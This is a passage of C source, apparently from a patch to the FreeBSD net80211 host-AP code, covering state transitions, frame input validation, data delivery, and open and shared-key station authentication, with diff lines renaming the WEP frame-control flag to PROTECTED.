!IEEE80211_IS_CHAN_RADAR(vap->iv_des_chan)) { /* * Already have a channel; bypass the * scan and startup immediately. * ieee80211_create_ibss will call back to * move us to RUN state. */ ieee80211_create_ibss(vap, vap->iv_des_chan); break; } /* * Initiate a scan. We can come here as a result * of an IEEE80211_IOC_SCAN_REQ too in which case * the vap will be marked with IEEE80211_FEXT_SCANREQ * and the scan request parameters will be present * in iv_scanreq. Otherwise we do the default. */ if (vap->iv_flags_ext & IEEE80211_FEXT_SCANREQ) { ieee80211_check_scan(vap, vap->iv_scanreq_flags, vap->iv_scanreq_duration, vap->iv_scanreq_mindwell, vap->iv_scanreq_maxdwell, vap->iv_scanreq_nssid, vap->iv_scanreq_ssid); vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANREQ; } else ieee80211_check_scan_current(vap); break; case IEEE80211_S_SCAN: /* * A state change requires a reset; scan. */ ieee80211_check_scan_current(vap); break; default: break; } break; case IEEE80211_S_CAC: /* * Start CAC on a DFS channel. We come here when starting * a bss on a DFS channel (see ieee80211_create_ibss). */ ieee80211_dfs_cac_start(vap); break; case IEEE80211_S_RUN: if (vap->iv_flags & IEEE80211_F_WPA) { /* XXX validate prerequisites */ } switch (ostate) { case IEEE80211_S_INIT: /* * Already have a channel; bypass the * scan and startup immediately. * Note that ieee80211_create_ibss will call * back to do a RUN->RUN state change. */ ieee80211_create_ibss(vap, ieee80211_ht_adjust_channel(ic, ic->ic_curchan, vap->iv_flags_ht)); /* NB: iv_bss is changed on return */ break; case IEEE80211_S_CAC: /* * NB: This is the normal state change when CAC * expires and no radar was detected; no need to * clear the CAC timer as it's already expired. */ /* fall thru... */ case IEEE80211_S_CSA: /* * Shorten inactivity timer of associated stations * to weed out sta's that don't follow a CSA. 
*/ ieee80211_iterate_nodes(&ic->ic_sta, sta_csa, vap); /* * Update bss node channel to reflect where * we landed after CSA. */ ieee80211_node_set_chan(vap->iv_bss, ieee80211_ht_adjust_channel(ic, ic->ic_curchan, ieee80211_htchanflags(vap->iv_bss->ni_chan))); /* XXX bypass debug msgs */ break; case IEEE80211_S_SCAN: case IEEE80211_S_RUN: #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap)) { struct ieee80211_node *ni = vap->iv_bss; ieee80211_note(vap, "synchronized with %s ssid ", ether_sprintf(ni->ni_bssid)); ieee80211_print_essid(ni->ni_essid, ni->ni_esslen); /* XXX MCS/HT */ printf(" channel %d start %uMb\n", ieee80211_chan2ieee(ic, ic->ic_curchan), IEEE80211_RATE2MBS(ni->ni_txrate)); } #endif break; default: break; } /* * Start/stop the authenticator. We delay until here * to allow configuration to happen out of order. */ if (vap->iv_auth->ia_attach != NULL) { /* XXX check failure */ vap->iv_auth->ia_attach(vap); } else if (vap->iv_auth->ia_detach != NULL) { vap->iv_auth->ia_detach(vap); } ieee80211_node_authorize(vap->iv_bss); break; case IEEE80211_S_CSA: if (ostate == IEEE80211_S_RUN && isbandchange(ic)) { /* * On a ``band change'' silently drop associated * stations as they must re-associate before they * can pass traffic (as otherwise protocol state * such as capabilities and the negotiated rate * set may/will be wrong). */ ieee80211_iterate_nodes(&ic->ic_sta, sta_drop, vap); } break; default: break; } return 0; } static void hostap_deliver_data(struct ieee80211vap *vap, struct ieee80211_node *ni, struct mbuf *m) { struct ether_header *eh = mtod(m, struct ether_header *); struct ifnet *ifp = vap->iv_ifp; /* clear driver/net80211 flags before passing up */ #if __FreeBSD_version >= 1000046 m->m_flags &= ~(M_MCAST | M_BCAST); m_clrprotoflags(m); #else m->m_flags &= ~(M_80211_RX | M_MCAST | M_BCAST); #endif KASSERT(vap->iv_opmode == IEEE80211_M_HOSTAP, ("gack, opmode %d", vap->iv_opmode)); /* * Do accounting. */ ifp->if_ipackets++; IEEE80211_NODE_STAT(ni, rx_data); IEEE80211_NODE_STAT_ADD(ni, rx_bytes, m->m_pkthdr.len); if (ETHER_IS_MULTICAST(eh->ether_dhost)) { m->m_flags |= M_MCAST; /* XXX M_BCAST? */ IEEE80211_NODE_STAT(ni, rx_mcast); } else IEEE80211_NODE_STAT(ni, rx_ucast); /* perform as a bridge within the AP */ if ((vap->iv_flags & IEEE80211_F_NOBRIDGE) == 0) { struct mbuf *mcopy = NULL; if (m->m_flags & M_MCAST) { mcopy = m_dup(m, M_NOWAIT); if (mcopy == NULL) ifp->if_oerrors++; else mcopy->m_flags |= M_MCAST; } else { /* * Check if the destination is associated with the * same vap and authorized to receive traffic. * Beware of traffic destined for the vap itself; * sending it will not work; just let it be delivered * normally. */ struct ieee80211_node *sta = ieee80211_find_vap_node( &vap->iv_ic->ic_sta, vap, eh->ether_dhost); if (sta != NULL) { if (ieee80211_node_is_authorized(sta)) { /* * Beware of sending to ourself; this * needs to happen via the normal * input path. */ if (sta != vap->iv_bss) { mcopy = m; m = NULL; } } else { vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(sta, rx_unauth); } ieee80211_free_node(sta); } } if (mcopy != NULL) { int len, err; len = mcopy->m_pkthdr.len; err = ieee80211_vap_xmitpkt(vap, mcopy); if (err) { /* NB: IFQ_HANDOFF reclaims mcopy */ } else { ifp->if_opackets++; } } } if (m != NULL) { /* * Mark frame as coming from vap's interface. */ m->m_pkthdr.rcvif = ifp; if (m->m_flags & M_MCAST) { /* * Spam DWDS vap's w/ multicast traffic. */ /* XXX only if dwds in use? 
*/ ieee80211_dwds_mcast(vap, m); } if (ni->ni_vlan != 0) { /* attach vlan tag */ m->m_pkthdr.ether_vtag = ni->ni_vlan; m->m_flags |= M_VLANTAG; } ifp->if_input(ifp, m); } } /* * Decide if a received management frame should be * printed when debugging is enabled. This filters some * of the less interesting frames that come frequently * (e.g. beacons). */ static __inline int doprint(struct ieee80211vap *vap, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BEACON: return (vap->iv_ic->ic_flags & IEEE80211_F_SCAN); case IEEE80211_FC0_SUBTYPE_PROBE_REQ: return 0; } return 1; } /* * Process a received frame. The node associated with the sender * should be supplied. If nothing was found in the node table then * the caller is assumed to supply a reference to iv_bss instead. * The RSSI and a timestamp are also supplied. The RSSI data is used * during AP scanning to select a AP to associate with; it can have * any units so long as values have consistent units and higher values * mean ``better signal''. The receive timestamp is currently not used * by the 802.11 layer. */ static int hostap_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct ieee80211_key *key; struct ether_header *eh; int hdrspace, need_tap = 1; /* mbuf need to be tapped. */ uint8_t dir, type, subtype, qos; uint8_t *bssid; uint16_t rxseq; if (m->m_flags & M_AMPDU_MPDU) { /* * Fastpath for A-MPDU reorder q resubmission. Frames * w/ M_AMPDU_MPDU marked have already passed through * here but were received out of order and been held on * the reorder queue. When resubmitted they are marked * with the M_AMPDU_MPDU flag and we can bypass most of * the normal processing. */ wh = mtod(m, struct ieee80211_frame *); type = IEEE80211_FC0_TYPE_DATA; dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; subtype = IEEE80211_FC0_SUBTYPE_QOS; hdrspace = ieee80211_hdrspace(ic, wh); /* XXX optimize? */ goto resubmit_ampdu; } KASSERT(ni != NULL, ("null node")); ni->ni_inact = ni->ni_inact_reload; type = -1; /* undefined */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. */ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version, fc %02x:%02x", wh->i_fc[0], wh->i_fc[1]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { if (dir != IEEE80211_FC1_DIR_NODS) bssid = wh->i_addr1; else if (type == IEEE80211_FC0_TYPE_CTL) bssid = wh->i_addr1; else { if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (2): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } bssid = wh->i_addr3; } /* * Validate the bssid. 
*/ if (!(type == IEEE80211_FC0_TYPE_MGT && subtype == IEEE80211_FC0_SUBTYPE_BEACON) && !IEEE80211_ADDR_EQ(bssid, vap->iv_bss->ni_bssid) && !IEEE80211_ADDR_EQ(bssid, ifp->if_broadcastaddr)) { /* not interested in */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, NULL, "%s", "not to bss"); vap->iv_stats.is_rx_wrongbss++; goto out; } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } } switch (type) { case IEEE80211_FC0_TYPE_DATA: hdrspace = ieee80211_hdrspace(ic, wh); if (m->m_len < hdrspace && (m = m_pullup(m, hdrspace)) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } if (!(dir == IEEE80211_FC1_DIR_TODS || (dir == IEEE80211_FC1_DIR_DSTODS && (vap->iv_flags & IEEE80211_F_DWDS)))) { if (dir != IEEE80211_FC1_DIR_DSTODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); } else { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT | IEEE80211_MSG_WDS, wh, "4-address data", "%s", "DWDS not enabled"); } vap->iv_stats.is_rx_wrongdir++; goto out; } /* check if source STA is associated */ if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "%s", "unknown src"); ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_DEAUTH, IEEE80211_REASON_NOT_AUTHED); vap->iv_stats.is_rx_notassoc++; goto err; } if (ni->ni_associd == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "%s", "unassoc src"); IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DISASSOC, IEEE80211_REASON_NOT_ASSOCED); vap->iv_stats.is_rx_notassoc++; goto err; } /* * Check for power save state change. * XXX out-of-order A-MPDU frames? */ if (((wh->i_fc[1] & IEEE80211_FC1_PWR_MGT) ^ (ni->ni_flags & IEEE80211_NODE_PWR_MGT))) vap->iv_node_ps(ni, wh->i_fc[1] & IEEE80211_FC1_PWR_MGT); /* * For 4-address packets handle WDS discovery * notifications. Once a WDS link is setup frames * are just delivered to the WDS vap (see below). */ if (dir == IEEE80211_FC1_DIR_DSTODS && ni->ni_wdsvap == NULL) { if (!ieee80211_node_is_authorized(ni)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT | IEEE80211_MSG_WDS, wh, "4-address data", "%s", "unauthorized port"); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } ieee80211_dwds_discover(ni, m); return type; } /* * Handle A-MPDU re-ordering. If the frame is to be * processed directly then ieee80211_ampdu_reorder * will return 0; otherwise it has consumed the mbuf * and we should do nothing more with it. */ if ((m->m_flags & M_AMPDU) && ieee80211_ampdu_reorder(ni, m) != 0) { m = NULL; goto out; } resubmit_ampdu: /* * Handle privacy requirements. 
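The duplicate check above compares the received sequence-control word, per TID, against the last value recorded in ni_rxseqs[]. Below is a simplified sketch of just that comparison; the in-tree ieee80211_check_rxseq() also honours the retry bit, and the mask constants here are local stand-ins.

    #include <stdbool.h>
    #include <stdint.h>

    #define SEQ_FRAG_MASK  0x000f
    #define SEQ_SEQ_MASK   0xfff0
    #define SEQ_SEQ_SHIFT  4

    /* A frame is a duplicate candidate when both the sequence number and
     * the fragment number match the last value seen for the same TID. */
    static bool
    same_seq(uint16_t rxseq, uint16_t last)
    {
        return ((rxseq & SEQ_SEQ_MASK) >> SEQ_SEQ_SHIFT) ==
               ((last  & SEQ_SEQ_MASK) >> SEQ_SEQ_SHIFT) &&
               (rxseq & SEQ_FRAG_MASK) == (last & SEQ_FRAG_MASK);
    }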
Note that we * must not be preempted from here until after * we (potentially) call ieee80211_crypto_demic; * otherwise we may violate assumptions in the * crypto cipher modules used to do delayed update * of replay sequence numbers. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "WEP", "%s", "PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; IEEE80211_NODE_STAT(ni, rx_noprivacy); goto out; } key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ IEEE80211_NODE_STAT(ni, rx_wepfail); goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } else { /* XXX M_WEP and IEEE80211_F_PRIVACY */ key = NULL; } /* * Save QoS bits for use below--before we strip the header. */ if (subtype == IEEE80211_FC0_SUBTYPE_QOS) { qos = (dir == IEEE80211_FC1_DIR_DSTODS) ? ((struct ieee80211_qosframe_addr4 *)wh)->i_qos[0] : ((struct ieee80211_qosframe *)wh)->i_qos[0]; } else qos = 0; /* * Next up, any fragmentation. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = NULL; /* no longer valid, catch any uses */ /* * Next strip any MSDU crypto bits. */ if (key != NULL && !ieee80211_crypto_demic(vap, key, m, 0)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "demic error"); vap->iv_stats.is_rx_demicfail++; IEEE80211_NODE_STAT(ni, rx_demicfail); goto out; } /* copy to listener after decrypt */ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = ieee80211_decap(vap, m, hdrspace); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } eh = mtod(m, struct ether_header *); if (!ieee80211_node_is_authorized(ni)) { /* * Deny any non-PAE frames received prior to * authorization. For open/shared-key * authentication the port is mark authorized * after authentication completes. For 802.1x * the port is not marked authorized by the * authenticator until the handshake has completed. */ if (eh->ether_type != htons(ETHERTYPE_PAE)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, eh->ether_shost, "data", "unauthorized port: ether type 0x%x len %u", eh->ether_type, m->m_pkthdr.len); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } } else { /* * When denying unencrypted frames, discard * any non-PAE frames received without encryption. */ if ((vap->iv_flags & IEEE80211_F_DROPUNENC) && (key == NULL && (m->m_flags & M_WEP) == 0) && eh->ether_type != htons(ETHERTYPE_PAE)) { /* * Drop unencrypted frames. */ vap->iv_stats.is_rx_unencrypted++; IEEE80211_NODE_STAT(ni, rx_unencrypted); goto out; } } /* XXX require HT? 
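This is one of the spots the patch touches: the bit formerly tested as IEEE80211_FC1_WEP is now spelled IEEE80211_FC1_PROTECTED, with unchanged semantics. A small sketch of the decision it gates; the enum and helper are illustrative, not part of the tree.

    #include <stdint.h>

    #define FC1_PROTECTED 0x40  /* the renamed "WEP"/Protected Frame bit */

    enum rx_crypto { RX_PLAINTEXT, RX_NEEDS_DECAP, RX_DROP_NO_PRIVACY };

    /* Protected frames are dropped when the vap has privacy disabled and
     * otherwise handed to the crypto layer for decapsulation; the bit is
     * cleared in the header once decapsulation succeeds. */
    static enum rx_crypto
    classify_rx(uint8_t fc1, int privacy_enabled)
    {
        if ((fc1 & FC1_PROTECTED) == 0)
            return RX_PLAINTEXT;
        return privacy_enabled ? RX_NEEDS_DECAP : RX_DROP_NO_PRIVACY;
    }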
*/ if (qos & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } else { #ifdef IEEE80211_SUPPORT_SUPERG m = ieee80211_decap_fastframe(vap, ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; #endif } if (dir == IEEE80211_FC1_DIR_DSTODS && ni->ni_wdsvap != NULL) ieee80211_deliver_data(ni->ni_wdsvap, ni, m); else hostap_deliver_data(vap, ni, m); return IEEE80211_FC0_TYPE_DATA; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "mgt", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } if (IEEE80211_IS_MULTICAST(wh->i_addr2)) { /* ensure return frames are unicast */ IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "source is multicast: %s", ether_sprintf(wh->i_addr2)); vap->iv_stats.is_rx_mgtdiscard++; /* XXX stat */ goto out; } #ifdef IEEE80211_DEBUG if ((ieee80211_msg_debug(vap) && doprint(vap, subtype)) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if (subtype != IEEE80211_FC0_SUBTYPE_AUTH) { /* * Only shared key auth frames with a challenge * should be encrypted, discard all others. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; goto out; } hdrspace = ieee80211_hdrspace(ic, wh); key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } /* * Pass the packet to radiotap before calling iv_recv_mgmt(). * Otherwise iv_recv_mgmt() might pass another packet to * radiotap, resulting in out of order packet captures. 
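The A-MSDU branch above keys off the QoS-control byte saved before the 802.11 header was stripped. The sketch below shows how that byte breaks down; bit positions follow the 802.11 spec and the constants are defined locally for the example.

    #include <stdint.h>

    #define QOS_TID       0x0f
    #define QOS_ACKPOLICY 0x60
    #define QOS_AMSDU     0x80

    struct qos_fields { uint8_t tid, ackpolicy, amsdu; };

    static struct qos_fields
    decode_qos(uint8_t qos)
    {
        struct qos_fields q = {
            .tid = qos & QOS_TID,                     /* traffic identifier */
            .ackpolicy = (qos & QOS_ACKPOLICY) >> 5,  /* ack policy */
            .amsdu = (qos & QOS_AMSDU) != 0,          /* A-MSDU present */
        };
        return q;
    }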
*/ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); vap->iv_recv_ctl(ni, m, subtype); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "bad", "frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; } static void hostap_auth_open(struct ieee80211_node *ni, struct ieee80211_frame *wh, int rssi, int nf, uint16_t seq, uint16_t status) { struct ieee80211vap *vap = ni->ni_vap; KASSERT(vap->iv_state == IEEE80211_S_RUN, ("state %d", vap->iv_state)); if (ni->ni_authmode == IEEE80211_AUTH_SHARED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "open auth", "bad sta auth mode %u", ni->ni_authmode); vap->iv_stats.is_rx_bad_auth++; /* XXX */ /* * Clear any challenge text that may be there if * a previous shared key auth failed and then an * open auth is attempted. */ if (ni->ni_challenge != NULL) { free(ni->ni_challenge, M_80211_NODE); ni->ni_challenge = NULL; } /* XXX hack to workaround calling convention */ ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, (seq + 1) | (IEEE80211_STATUS_ALG<<16)); return; } if (seq != IEEE80211_AUTH_OPEN_REQUEST) { vap->iv_stats.is_rx_bad_auth++; return; } /* always accept open authentication requests */ if (ni == vap->iv_bss) { ni = ieee80211_dup_bss(vap, wh->i_addr2); if (ni == NULL) return; } else if ((ni->ni_flags & IEEE80211_NODE_AREF) == 0) (void) ieee80211_ref_node(ni); /* * Mark the node as referenced to reflect that it's * reference count has been bumped to insure it remains * after the transaction completes. */ ni->ni_flags |= IEEE80211_NODE_AREF; /* * Mark the node as requiring a valid association id * before outbound traffic is permitted. */ ni->ni_flags |= IEEE80211_NODE_ASSOCID; if (vap->iv_acl != NULL && vap->iv_acl->iac_getpolicy(vap) == IEEE80211_MACCMD_POLICY_RADIUS) { /* * When the ACL policy is set to RADIUS we defer the * authorization to a user agent. Dispatch an event, * a subsequent MLME call will decide the fate of the * station. If the user agent is not present then the * node will be reclaimed due to inactivity. */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH | IEEE80211_MSG_ACL, ni->ni_macaddr, "%s", "station authentication defered (radius acl)"); ieee80211_notify_node_auth(ni); } else { IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, seq + 1); IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, ni->ni_macaddr, "%s", "station authenticated (open)"); /* * When 802.1x is not in use mark the port * authorized at this point so traffic can flow. */ if (ni->ni_authmode != IEEE80211_AUTH_8021X) ieee80211_node_authorize(ni); } } static void hostap_auth_shared(struct ieee80211_node *ni, struct ieee80211_frame *wh, uint8_t *frm, uint8_t *efrm, int rssi, int nf, uint16_t seq, uint16_t status) { struct ieee80211vap *vap = ni->ni_vap; uint8_t *challenge; int allocbs, estatus; KASSERT(vap->iv_state == IEEE80211_S_RUN, ("state %d", vap->iv_state)); /* * NB: this can happen as we allow pre-shared key * authentication to be enabled w/o wep being turned * on so that configuration of these can be done * in any order. It may be better to enforce the * ordering in which case this check would just be * for sanity/consistency. 
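The "hack to workaround calling convention" noted above packs two 16-bit values into the single argument handed to ieee80211_send_error(): the response sequence number in the low half and the status code in the high half, presumably split back apart on the transmit side. A minimal illustration:

    #include <stdint.h>

    static uint32_t
    pack_auth_arg(uint16_t seq, uint16_t status)
    {
        return (uint32_t)seq | ((uint32_t)status << 16);
    }

    /* and the matching unpack */
    static uint16_t auth_seq(uint32_t arg)    { return arg & 0xffff; }
    static uint16_t auth_status(uint32_t arg) { return arg >> 16; }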
*/ if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "%s", " PRIVACY is disabled"); estatus = IEEE80211_STATUS_ALG; goto bad; } /* * Pre-shared key authentication is evil; accept * it only if explicitly configured (it is supported * mainly for compatibility with clients like Mac OS X). */ if (ni->ni_authmode != IEEE80211_AUTH_AUTO && ni->ni_authmode != IEEE80211_AUTH_SHARED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad sta auth mode %u", ni->ni_authmode); vap->iv_stats.is_rx_bad_auth++; /* XXX maybe a unique error? */ estatus = IEEE80211_STATUS_ALG; goto bad; } challenge = NULL; if (frm + 1 < efrm) { if ((frm[1] + 2) > (efrm - frm)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "ie %d/%d too long", frm[0], (frm[1] + 2) - (efrm - frm)); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (*frm == IEEE80211_ELEMID_CHALLENGE) challenge = frm; frm += frm[1] + 2; } switch (seq) { case IEEE80211_AUTH_SHARED_CHALLENGE: case IEEE80211_AUTH_SHARED_RESPONSE: if (challenge == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "%s", "no challenge"); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (challenge[1] != IEEE80211_CHALLENGE_LEN) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad challenge len %d", challenge[1]); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } default: break; } switch (seq) { case IEEE80211_AUTH_SHARED_REQUEST: if (ni == vap->iv_bss) { ni = ieee80211_dup_bss(vap, wh->i_addr2); if (ni == NULL) { /* NB: no way to return an error */ return; } allocbs = 1; } else { if ((ni->ni_flags & IEEE80211_NODE_AREF) == 0) (void) ieee80211_ref_node(ni); allocbs = 0; } /* * Mark the node as referenced to reflect that it's * reference count has been bumped to insure it remains * after the transaction completes. */ ni->ni_flags |= IEEE80211_NODE_AREF; /* * Mark the node as requiring a valid associatio id * before outbound traffic is permitted. */ ni->ni_flags |= IEEE80211_NODE_ASSOCID; IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (!ieee80211_alloc_challenge(ni)) { /* NB: don't return error so they rexmit */ return; } get_random_bytes(ni->ni_challenge, IEEE80211_CHALLENGE_LEN); IEEE80211_NOTE(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, ni, "shared key %sauth request", allocbs ? "" : "re"); /* * When the ACL policy is set to RADIUS we defer the * authorization to a user agent. Dispatch an event, * a subsequent MLME call will decide the fate of the * station. If the user agent is not present then the * node will be reclaimed due to inactivity. 
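The shared-key path above only trusts a challenge element after checking that its claimed length fits inside the frame and equals the fixed challenge size. A generalized sketch of that bounds check follows; element ID 16 and the 128-byte length come from the 802.11 shared-key definition, and the walk over multiple IEs is an extension added for illustration (the code above inspects only the first element).

    #include <stddef.h>
    #include <stdint.h>

    #define ELEMID_CHALLENGE 16
    #define CHALLENGE_LEN    128

    static const uint8_t *
    find_challenge(const uint8_t *frm, const uint8_t *efrm)
    {
        while (efrm - frm >= 2) {
            ptrdiff_t ielen = 2 + frm[1];
            if (ielen > efrm - frm)
                return NULL;        /* truncated element */
            if (frm[0] == ELEMID_CHALLENGE && frm[1] == CHALLENGE_LEN)
                return frm;
            frm += ielen;
        }
        return NULL;
    }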
